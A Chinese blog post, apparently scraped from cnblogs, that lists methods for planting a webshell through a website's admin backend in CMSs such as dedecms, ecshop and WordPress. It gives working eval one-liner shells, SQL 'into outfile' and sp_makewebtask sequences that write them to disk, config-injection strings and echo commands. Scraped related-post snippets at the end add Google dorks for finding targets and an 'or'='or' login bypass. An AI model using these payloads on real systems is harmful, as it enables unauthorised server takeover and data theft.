网站后台getshell的方法总结

网站后台getshell的方法总结

方法一:直接上传getshell

以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:

即可成功上传大马,并成功执行,从而拿下webshell。

坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名

方法二:数据库备份getshell

以南方数据cms为例:

1,首先上传一张图片马上去,并且获取图片马的路径

2,在系统管理处选择数据库备份,进行数据库备份getshell,具体操作方法如下:

然后使用菜刀连接即可成功getshell。

当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可)

<%eval request ("pass")%>

然后再通过备份数据库getshell。

方法三:修改网站上传类型配置拿webshell

有的网站在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型,如添加asp|php|jsp|aspx|asa|cer等来拿webshell。

方法四:利用文件解析漏洞来拿webshell

记录在了这篇博客上面:https://www.cnblogs.com/v01cano/p/10326366.html

方法五:网站配置插马拿webshell:

注:asp中单引号表示单行注释作用

“%><%eval request("v01cano")%><%‘

一般先试试看该选项是否可以更改,如果可以更改,则插马试试,因为插马可能导致系统崩溃,所以一般需要首先需要本地搭建环境进行测试。

方法六:通过编辑器模板拿webshell

1,通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell。比如ecshop

2,通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿webshell。

方法七:通过添加插件getshell

即利用网站管理员的添加插件功能getshell,将大马添加到插件的压缩包中,然后上传,从而getshell。比如wordpress,dz等等。

方法八:执行sql语句写入webshell

通过sql语句写入shell,首先执行错误的sql语句,使其暴露出网站的根目录:

select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";

关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。

以ecshop为例:

也可以先将一句话通过新建管理员写入到user表中,然后通过数据库备份配合解析漏洞拿shell。

方法九:通过数据库拿webshell

我们可以通过数据库执行命令导出一句话到网站根目录拿shell

access数据库导出一般需要利用解析漏洞xx.asp;.xml

sqlserver导出:

exec sp_makewebtask ‘C:\test1.php‘,‘ select ‘‘<%eval request("pass")%>‘‘ ‘--

mysql命令导出getshell:

方法1

 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma]);?>‘);
 select xiaoma1 from xiaoma into outfile ‘D:/phpstudy/www/7.php‘;
 Drop TABLE IF EXISTS xiaoma;

方法2

select "<?php eval($_POST[v01cano]);?>" into outfile ‘D:/phpstudy/www/a.php‘

方法3:方法1和方法2都是在网站根目录路径已知的时候写入shell,当数据库路径未知时,可以通过如下方法读取数据库路径:网站的根目录一般在网站配置文件httpd.conf中,而此目录的路径一般不变,一般在/apache/conf/httpd.conf中,(在phpmyadmin中的时候,我们可以选择变量选项观察其路径,进而推测httpd.conf的路径),在已知该文件路径的条件下,我们可以通过如下方法读取该文件中的内容:

//创建表a,并且将httpd.conf写入到表a中。
create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:

httpd.conf文件可能存在的一些路径:

linux中可能存在路径:

apache
/usr/local/mysql
/user/local/apache/conf/httpd.conf
/user/local/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/user/local/apache2/conf/httpd.conf

Nginx:

/user/local/nginx/conf/httpd.conf

方法四:直接通过load_file函数直接加载该文件内容

select load_file(‘C:/phpStudy/Apache/conf/httpd.conf‘);

但是需要在选项中进行如下配置才会显示出来:

方法n:还有通过日志拿shell的多种方式,已经记录在博客:

https://www.cnblogs.com/v01cano/p/10292670.html

方法十:通过文件包含拿webshell

先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可以绕过waf拿webshell。

常用的文件包含方法如下:

asp包含:
1,<!--#include file="123.jpg"-->
2,调用的文件必须和被调用的文件在同一目录,否则找不到
3,如果不在同一目录,用下面语句也可以:
<!--#include virtual="文件所在目录/123.jpg"-->

php包含:
<?php
Include(‘123.jpg‘);
?>

方法十一:命令执行拿webshell

Echo ^<^?php @eval($_POST[v01cano]);?^>^ >c:\1.php

^<^%eval request("cracer")%^>^ >c:\1.php

十二:没有进入后台如下拿webshell

  • 0day拿webshell
  • IIS写权限拿webshell(put一个shell进去)
  • 命令执行拿webshell
  • 通过注入漏洞拿webshell
  • 前台图片上传拿webshell
  • Strusts2拿webshell
  • java反序列拿shell

原文地址:https://www.cnblogs.com/v01cano/p/10326318.html

时间: 2024-10-07 13:03:09

网站后台getshell的方法总结的相关文章

45种攻入网站后台的方法

45种攻入后台的方法1.到Google搜索,site:cq.cn inurl:asp2.到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!3.利用挖掘鸡和一个ASP木马:文件名是login.asp……路径组是/manage/关键词是went.asp用’or’='or’来登陆4.以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高:关键字:“Co Net MIB Ver 1.0网站后台管理系统”帐号密码为 ‘or’='or’5.动感购

论找网站后台的几个方法

前言: 有可能你在渗透测试的过程中会遇到这样一个问题:目标站存在sql注入,却找不到后台,这是不是很蛋疼呢?所以这就是写这篇文章的目的:如何找网站后台 1.字典扫描 原理:利用敏感url(由很多url组成的俗称字典)对网站进行发包,利用返回包的状态码来进行判断区分,常见的如200(存在),403(存在但禁止访问),404(不存在) 更多状态码请自行百度或者谷歌,这里不再详述 代表工具:御剑 dirbuster 御剑就不说了,简单易操作,填好目标url,然后把200,403都勾选上,就差不多了 D

织梦重置密码的方法和织梦网站后台登陆账号修改方法

1.打开数据库,找到数据库表名为:dede_admin,单击dede_admin,将 d95a993df018d377fef8,替换为:f297a57a5a743894a0e4   ,这个值表示:admin就是织梦的默认密码.替换后保存. 2.将radminpass.php上传网站根目录,访问域名/radminpass.php 3.登录网站后台修改 4.织梦网站后台登陆账号修改方法     update dede_admin set userid='admin' where id=1     执

ajax如何调用后台定义的方法

ajax如何调用后台定义的方法:由于ajax的独特优势,使得它在当前大量网站得到了广泛的应用,下面就介绍一下ajax如何调用后台定义的函数,虽然比较简单,不过希望能够给初学者带来一定的帮助,代码如下:1.首先我们先创建一个antzone.aspx页面.2.在它的cs文件中创建如下函数: public static string mytest(string first, string second) { return return first+second; } 2.html代码如下: <form

PHPCMS 修改后台路径简便方法

之前在网上找了很多关于修改phpcms后台路径的修改方法,但是都太繁琐(个人感觉),终于找到了一个相对简单的修改方法,在这里和大家分享一下,希望互相学习. 第一步:在网站根目录创建一个文件夹,以后就要通过这个文件夹进入后台登录界面的,所以文件夹名就要取一个不易被人轻易猜到的名称.这里作为演示,我就取为  adminweb 好了.接着,在这个文件夹里新建一个文件index.php,内容为: <?php define('PHPCMS_PATH', realpath(dirname(__FILE__)

习科小D整理找网站后台办法[科普]

习科科普贴,如何找到网站的后台 作者:小Dの马甲来自:习科论坛 - Silic.Org - BlackBap.Org 1, 穷举猜解    现如今可以暴力猜解网站后台登陆地址的软件有很多,从最早的啊D注入工具开始,一直到现在很多常用的工具(通常为SQL注入利用工具)都会带有后台登陆地址猜解的功能.    当然了,这个猜解绝大部分是根据字典来的,只要字典强大,用哪个工具猜倒显得不是那么重要了.需要注意的是,要看工具猜解路径的运用原理,大部分是根据返回的头部的代码,如200,404等等,这里要特别注

在phpmyadmin后台获取webshell方法汇总整理

方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xia

利用ThinkPHP搭建网站后台架构

记录一下ThinkPHP搭建网站后台.调整好样式等操作步骤 下载好ThinkPHP(3.2.3),解压后将核心文件夹ThinkPHP以及index.php等文件复制到网站根目录如下图 对index.php文件进行操作,修改参数使生成的网站目录是自己想要的目录 <?php // 应用入口文件 // 检测PHP环境 if(version_compare(PHP_VERSION,'5.3.0','<')) die('require PHP > 5.3.0 !'); //设置响应头 header

利用SQL注入漏洞登录后台的实现方法

利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句 早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的.  如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞.但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的.  前些天,网上传